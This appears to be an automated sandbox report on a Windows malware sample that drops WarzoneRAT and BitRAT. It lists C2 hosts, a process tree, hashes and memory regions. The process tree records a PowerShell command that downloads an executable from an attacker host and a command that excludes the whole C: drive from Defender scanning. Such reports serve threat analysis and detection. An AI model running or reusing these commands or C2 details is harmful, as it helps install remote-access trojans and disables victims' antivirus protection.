Analysis

  • max time kernel
    151s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    22-09-2022 14:54

General

  • Target

    a2392a5423e76cc1046e4d25f6a62771.exe

  • Size

    3.6MB

  • MD5

    a2392a5423e76cc1046e4d25f6a62771

  • SHA1

    08c6d2bd8777037aa0e77b8937e285002d3a4f23

  • SHA256

    bdeab97a1a23c98b3a53d4c7d6c60276597ca67bd80f5d622ccc20b3d703f756

  • SHA512

    b778fb1419ad63527b5d504145fcec193d994646d20fd3a96f7bd0c55f26e5882abab69e4b99bf5116b16a6e9746226f5bc69113fc43ca856773a867ddaa3ed1

  • SSDEEP

    98304:IE7qm9FINlmzCTadUwYCQs+J7zU0RYvUc:IfJ+CSUw/p+hRYvUc

Malware Config

Extracted

Family

warzonerat

C2

sheet.duckdns.org:4110

Extracted

Family

bitrat

Version

1.38

C2

sheet.duckdns.org:8471

Attributes
  • communication_password

    81dc9bdb52d04dc20036dbd8313ed055

  • install_dir

    Install path

  • install_file

    Install name

  • tor_process

    tor

Signatures

  • BitRAT

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Warzone RAT payload 8 IoCs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 9 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 53 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a2392a5423e76cc1046e4d25f6a62771.exe
    "C:\Users\Admin\AppData\Local\Temp\a2392a5423e76cc1046e4d25f6a62771.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:2044
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Invoke-WebRequest -Uri http://sheet.duckdns.org:9000/sheeter.exe -Outfile ./sheeter.exe
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1956
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sheeter.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\./sheeter.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1608
      • C:\Users\Admin\AppData\Local\Temp\XRCCYX.exe
        "C:\Users\Admin\AppData\Local\Temp\XRCCYX.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of WriteProcessMemory
        PID:1104
        • C:\Windows\SysWOW64\WSCript.exe
          WSCript C:\Users\Admin\AppData\Local\Temp\CUVZTV.vbs
          4⤵
            PID:1764
        • C:\Users\Admin\AppData\Local\Temp\explorer.exe
          "C:\Users\Admin\AppData\Local\Temp\explorer.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:576
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell Add-MpPreference -ExclusionPath C:\
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:952
          • C:\Users\Admin\Documents\explorer.exe
            "C:\Users\Admin\Documents\explorer.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1116
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell Add-MpPreference -ExclusionPath C:\
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1868
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe"
              5⤵
                PID:604
          • C:\Users\Admin\AppData\Local\Temp\updater.exe
            "C:\Users\Admin\AppData\Local\Temp\updater.exe"
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:524
          • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
            "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde
            3⤵
            • Enumerates system info in registry
            • Modifies Internet Explorer settings
            • Modifies registry class
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious use of SetWindowsHookEx
            PID:860

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\CUVZTV.vbs

        Filesize

        832B

        MD5

        7b88dc87f846cb86651815d1f650ddc5

        SHA1

        a9556677d0d28d3fe13468f55b3c1352eaf0cb87

        SHA256

        f2ac23ed9e1bd7a05bc3a41aa53637e49fb22185619dcb038479c453ac369e1f

        SHA512

        e400d521a0025973f98137ecceede2780b0b199cc98ba9dc08291641615df3b6ce4f0a9ce4bfacf82649cbc7ccd6f8aee9816c4588924f15f6de8858cb78bb6e

      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sheeter.exe

        Filesize

        5.0MB

        MD5

        4e4d51350f186355c0bade0a4093847b

        SHA1

        6b0bb9f756eb18699f354aed4d8ecdccddf26c71

        SHA256

        b244154eb02dde8424ac1dfc45cf8b1351de4c80c35ccbc338be7425c0a382d7

        SHA512

        76b306573ca767339730d675670d8259ca02a823dfd27b1833e2fc8a4b4d9e32cbf72943f6dbec13dc83a6f173dde1ab317bcf34f50c57f1826c38a4567608ad

      • C:\Users\Admin\AppData\Local\Temp\XRCCYX.exe

        Filesize

        1.1MB

        MD5

        f0f663b62326867adc306451762414b2

        SHA1

        0dd272467164856dacbdca66f5eea4b7a6100a76

        SHA256

        2f850169f3bd43936dfc32e0cf0bfbab58ce9dd70e598d151ecfe0ef09a3e499

        SHA512

        90f18b1a93bbbbf4b75466b6f484c811440311833fa574176ae9e6eee535aaf36c46ec420872752aba906cc271c5fa06f26f2b5fd09e33951e1ef969dc882fea

      • C:\Users\Admin\AppData\Local\Temp\XRCCYX.exe

        Filesize

        1.1MB

        MD5

        f0f663b62326867adc306451762414b2

        SHA1

        0dd272467164856dacbdca66f5eea4b7a6100a76

        SHA256

        2f850169f3bd43936dfc32e0cf0bfbab58ce9dd70e598d151ecfe0ef09a3e499

        SHA512

        90f18b1a93bbbbf4b75466b6f484c811440311833fa574176ae9e6eee535aaf36c46ec420872752aba906cc271c5fa06f26f2b5fd09e33951e1ef969dc882fea

      • C:\Users\Admin\AppData\Local\Temp\budget.xlsx

        Filesize

        20KB

        MD5

        f73ebdb3d2562351e70c5476172ff4c4

        SHA1

        49bf5e4428855a9b9f311e7127fd4ce0d5f89eb3

        SHA256

        4454f6250448bb08bbde2c54ac7308323bd60814461009cedba512781bc4d226

        SHA512

        3b3223841b40aa623edd68aed7e572c9703f55a10731f9077435e262813db3de2947880632f60f590d02a8f7248df30b93a8d1f9fef89b125031749c8c5ef5db

      • C:\Users\Admin\AppData\Local\Temp\explorer.exe

        Filesize

        132KB

        MD5

        6323c6a420ae7a3b7ace4a0a7bca4edd

        SHA1

        77b91d13642dfe93784470893111742c123c2244

        SHA256

        2fb55700d343afcad180486bedddb4ce8a632d11cbbde696d8db7a165543ae90

        SHA512

        bba9ad737f58366d4d34493652bdc247e5afc3884259bdf2035576ded750e3663bd946b7b0996a5e91015465ada8f162e65b2fcaaab963767395b1fbe447675c

      • C:\Users\Admin\AppData\Local\Temp\explorer.exe

        Filesize

        132KB

        MD5

        6323c6a420ae7a3b7ace4a0a7bca4edd

        SHA1

        77b91d13642dfe93784470893111742c123c2244

        SHA256

        2fb55700d343afcad180486bedddb4ce8a632d11cbbde696d8db7a165543ae90

        SHA512

        bba9ad737f58366d4d34493652bdc247e5afc3884259bdf2035576ded750e3663bd946b7b0996a5e91015465ada8f162e65b2fcaaab963767395b1fbe447675c

      • C:\Users\Admin\AppData\Local\Temp\updater.exe

        Filesize

        3.8MB

        MD5

        4ab049723f3f39517e74252409d34cc3

        SHA1

        7115fdc392fb8972c368f13c394f045ff76355fc

        SHA256

        9a5c441ddb5578d4f3d2f0c574c6b2311793b0f6fdb25ca437390a9d3aeaf49c

        SHA512

        7281cc6cd16f2f0174af814ba8e38f7f7fffe1503ddcc42954111371b16e61157c66667b6511a107adc853b25383978f1d531a05d2075e05deee28428e20386f

      • C:\Users\Admin\AppData\Local\Temp\updater.exe

        Filesize

        3.8MB

        MD5

        4ab049723f3f39517e74252409d34cc3

        SHA1

        7115fdc392fb8972c368f13c394f045ff76355fc

        SHA256

        9a5c441ddb5578d4f3d2f0c574c6b2311793b0f6fdb25ca437390a9d3aeaf49c

        SHA512

        7281cc6cd16f2f0174af814ba8e38f7f7fffe1503ddcc42954111371b16e61157c66667b6511a107adc853b25383978f1d531a05d2075e05deee28428e20386f

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

        Filesize

        7KB

        MD5

        82d3b60835c39689e91c4192a66bdb73

        SHA1

        96dc118da12efdb8802ebb764229b3af684d7382

        SHA256

        4c30581a901966ee35855e42387ae09fe14b1960856556556182cbc57a80a90e

        SHA512

        59949593b3daf708fcf57a38ac8043f914b46a71377ed67cae07196c86c0c80426163eca0190a942aa54516addf912a923e989ab330d79eee75632647bdd053b

      • C:\Users\Admin\Documents\explorer.exe

        Filesize

        132KB

        MD5

        6323c6a420ae7a3b7ace4a0a7bca4edd

        SHA1

        77b91d13642dfe93784470893111742c123c2244

        SHA256

        2fb55700d343afcad180486bedddb4ce8a632d11cbbde696d8db7a165543ae90

        SHA512

        bba9ad737f58366d4d34493652bdc247e5afc3884259bdf2035576ded750e3663bd946b7b0996a5e91015465ada8f162e65b2fcaaab963767395b1fbe447675c

      • C:\Users\Admin\Documents\explorer.exe

        Filesize

        132KB

        MD5

        6323c6a420ae7a3b7ace4a0a7bca4edd

        SHA1

        77b91d13642dfe93784470893111742c123c2244

        SHA256

        2fb55700d343afcad180486bedddb4ce8a632d11cbbde696d8db7a165543ae90

        SHA512

        bba9ad737f58366d4d34493652bdc247e5afc3884259bdf2035576ded750e3663bd946b7b0996a5e91015465ada8f162e65b2fcaaab963767395b1fbe447675c

      • \Users\Admin\AppData\Local\Temp\XRCCYX.exe

        Filesize

        1.1MB

        MD5

        f0f663b62326867adc306451762414b2

        SHA1

        0dd272467164856dacbdca66f5eea4b7a6100a76

        SHA256

        2f850169f3bd43936dfc32e0cf0bfbab58ce9dd70e598d151ecfe0ef09a3e499

        SHA512

        90f18b1a93bbbbf4b75466b6f484c811440311833fa574176ae9e6eee535aaf36c46ec420872752aba906cc271c5fa06f26f2b5fd09e33951e1ef969dc882fea

      • \Users\Admin\AppData\Local\Temp\explorer.exe

        Filesize

        132KB

        MD5

        6323c6a420ae7a3b7ace4a0a7bca4edd

        SHA1

        77b91d13642dfe93784470893111742c123c2244

        SHA256

        2fb55700d343afcad180486bedddb4ce8a632d11cbbde696d8db7a165543ae90

        SHA512

        bba9ad737f58366d4d34493652bdc247e5afc3884259bdf2035576ded750e3663bd946b7b0996a5e91015465ada8f162e65b2fcaaab963767395b1fbe447675c

      • \Users\Admin\AppData\Local\Temp\explorer.exe

        Filesize

        132KB

        MD5

        6323c6a420ae7a3b7ace4a0a7bca4edd

        SHA1

        77b91d13642dfe93784470893111742c123c2244

        SHA256

        2fb55700d343afcad180486bedddb4ce8a632d11cbbde696d8db7a165543ae90

        SHA512

        bba9ad737f58366d4d34493652bdc247e5afc3884259bdf2035576ded750e3663bd946b7b0996a5e91015465ada8f162e65b2fcaaab963767395b1fbe447675c

      • \Users\Admin\AppData\Local\Temp\updater.exe

        Filesize

        3.8MB

        MD5

        4ab049723f3f39517e74252409d34cc3

        SHA1

        7115fdc392fb8972c368f13c394f045ff76355fc

        SHA256

        9a5c441ddb5578d4f3d2f0c574c6b2311793b0f6fdb25ca437390a9d3aeaf49c

        SHA512

        7281cc6cd16f2f0174af814ba8e38f7f7fffe1503ddcc42954111371b16e61157c66667b6511a107adc853b25383978f1d531a05d2075e05deee28428e20386f

      • \Users\Admin\AppData\Local\Temp\updater.exe

        Filesize

        3.8MB

        MD5

        4ab049723f3f39517e74252409d34cc3

        SHA1

        7115fdc392fb8972c368f13c394f045ff76355fc

        SHA256

        9a5c441ddb5578d4f3d2f0c574c6b2311793b0f6fdb25ca437390a9d3aeaf49c

        SHA512

        7281cc6cd16f2f0174af814ba8e38f7f7fffe1503ddcc42954111371b16e61157c66667b6511a107adc853b25383978f1d531a05d2075e05deee28428e20386f

      • \Users\Admin\AppData\Local\Temp\updater.exe

        Filesize

        3.8MB

        MD5

        4ab049723f3f39517e74252409d34cc3

        SHA1

        7115fdc392fb8972c368f13c394f045ff76355fc

        SHA256

        9a5c441ddb5578d4f3d2f0c574c6b2311793b0f6fdb25ca437390a9d3aeaf49c

        SHA512

        7281cc6cd16f2f0174af814ba8e38f7f7fffe1503ddcc42954111371b16e61157c66667b6511a107adc853b25383978f1d531a05d2075e05deee28428e20386f

      • \Users\Admin\AppData\Local\Temp\updater.exe

        Filesize

        3.8MB

        MD5

        4ab049723f3f39517e74252409d34cc3

        SHA1

        7115fdc392fb8972c368f13c394f045ff76355fc

        SHA256

        9a5c441ddb5578d4f3d2f0c574c6b2311793b0f6fdb25ca437390a9d3aeaf49c

        SHA512

        7281cc6cd16f2f0174af814ba8e38f7f7fffe1503ddcc42954111371b16e61157c66667b6511a107adc853b25383978f1d531a05d2075e05deee28428e20386f

      • \Users\Admin\Documents\explorer.exe

        Filesize

        132KB

        MD5

        6323c6a420ae7a3b7ace4a0a7bca4edd

        SHA1

        77b91d13642dfe93784470893111742c123c2244

        SHA256

        2fb55700d343afcad180486bedddb4ce8a632d11cbbde696d8db7a165543ae90

        SHA512

        bba9ad737f58366d4d34493652bdc247e5afc3884259bdf2035576ded750e3663bd946b7b0996a5e91015465ada8f162e65b2fcaaab963767395b1fbe447675c

      • \Users\Admin\Documents\explorer.exe

        Filesize

        132KB

        MD5

        6323c6a420ae7a3b7ace4a0a7bca4edd

        SHA1

        77b91d13642dfe93784470893111742c123c2244

        SHA256

        2fb55700d343afcad180486bedddb4ce8a632d11cbbde696d8db7a165543ae90

        SHA512

        bba9ad737f58366d4d34493652bdc247e5afc3884259bdf2035576ded750e3663bd946b7b0996a5e91015465ada8f162e65b2fcaaab963767395b1fbe447675c

      • memory/524-79-0x0000000000400000-0x00000000007CE000-memory.dmp

        Filesize

        3.8MB

      • memory/524-77-0x0000000000000000-mapping.dmp

      • memory/524-99-0x0000000000370000-0x000000000037A000-memory.dmp

        Filesize

        40KB

      • memory/524-98-0x0000000000370000-0x000000000037A000-memory.dmp

        Filesize

        40KB

      • memory/524-94-0x0000000000370000-0x000000000037A000-memory.dmp

        Filesize

        40KB

      • memory/524-95-0x0000000000370000-0x000000000037A000-memory.dmp

        Filesize

        40KB

      • memory/576-71-0x0000000000000000-mapping.dmp

      • memory/604-118-0x0000000000000000-mapping.dmp

      • memory/604-119-0x0000000000120000-0x0000000000121000-memory.dmp

        Filesize

        4KB

      • memory/860-86-0x000000002F101000-0x000000002F104000-memory.dmp

        Filesize

        12KB

      • memory/860-111-0x0000000072A2D000-0x0000000072A38000-memory.dmp

        Filesize

        44KB

      • memory/860-89-0x0000000072A2D000-0x0000000072A38000-memory.dmp

        Filesize

        44KB

      • memory/860-88-0x000000005FFF0000-0x0000000060000000-memory.dmp

        Filesize

        64KB

      • memory/860-87-0x0000000071A41000-0x0000000071A43000-memory.dmp

        Filesize

        8KB

      • memory/860-110-0x000000005FFF0000-0x0000000060000000-memory.dmp

        Filesize

        64KB

      • memory/860-85-0x0000000000000000-mapping.dmp

      • memory/860-97-0x0000000072A2D000-0x0000000072A38000-memory.dmp

        Filesize

        44KB

      • memory/952-101-0x0000000000000000-mapping.dmp

      • memory/952-103-0x000000006BA50000-0x000000006BFFB000-memory.dmp

        Filesize

        5.7MB

      • memory/952-104-0x000000006BA50000-0x000000006BFFB000-memory.dmp

        Filesize

        5.7MB

      • memory/1104-67-0x0000000000000000-mapping.dmp

      • memory/1116-107-0x0000000000000000-mapping.dmp

      • memory/1608-65-0x0000000075F81000-0x0000000075F83000-memory.dmp

        Filesize

        8KB

      • memory/1608-63-0x0000000000000000-mapping.dmp

      • memory/1764-90-0x0000000000000000-mapping.dmp

      • memory/1868-117-0x00000000742F0000-0x000000007489B000-memory.dmp

        Filesize

        5.7MB

      • memory/1868-116-0x00000000742F0000-0x000000007489B000-memory.dmp

        Filesize

        5.7MB

      • memory/1868-113-0x0000000000000000-mapping.dmp

      • memory/1956-61-0x0000000002674000-0x0000000002677000-memory.dmp

        Filesize

        12KB

      • memory/1956-58-0x000007FEF2CC0000-0x000007FEF381D000-memory.dmp

        Filesize

        11.4MB

      • memory/1956-59-0x0000000002674000-0x0000000002677000-memory.dmp

        Filesize

        12KB

      • memory/1956-60-0x000000000267B000-0x000000000269A000-memory.dmp

        Filesize

        124KB

      • memory/1956-62-0x000000000267B000-0x000000000269A000-memory.dmp

        Filesize

        124KB

      • memory/1956-57-0x000007FEF3EF0000-0x000007FEF4913000-memory.dmp

        Filesize

        10.1MB

      • memory/1956-55-0x0000000000000000-mapping.dmp

      • memory/2044-54-0x000007FEFC251000-0x000007FEFC253000-memory.dmp

        Filesize

        8KB